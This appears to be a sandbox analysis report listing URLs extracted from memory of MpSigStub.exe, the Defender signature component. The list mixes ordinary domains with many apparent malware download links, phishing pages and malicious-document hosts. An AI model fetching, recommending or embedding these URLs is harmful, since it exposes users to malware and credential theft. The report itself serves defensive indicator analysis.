Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://jqueryui.com
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://justgaytgp.net/rd/out.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://kollaboration.intranet.stzh.ch/orga/asz-aszdokumentenbibliothek/Vorlagen/Makros/MakroMasterSt
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://kolo.crionn.com/kolo.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://ldjb.sriki.space/is/cact?i
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://license.mediapassonline.com/license1.aspl__
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://licenses.overpeer.com/simple_license.aspx
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://localhost/sss_/downloads/install.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media-plugin.info/tantyy.cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.sql.md
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.toopid.info?r=wmp&title=
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://mfeed.if.ua/sl/get.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://mog.com/a
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://monergismbooks.com/upgrade/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://movietrue.co.cc/?id=
Source: MpSigStub.exe, 0000000B.00000003.18280104198.0000021B5F2F2000.00000004.00000001.sdmp String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://multivaccine.co.kr/reset.php?strPC=%s&strPNO=%s&strSNO=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://nemesis.feed.parkingspa.com/Nemesis
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://news.google.com/news?ned=us&output=rss
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://onecs-live.azureedge.net
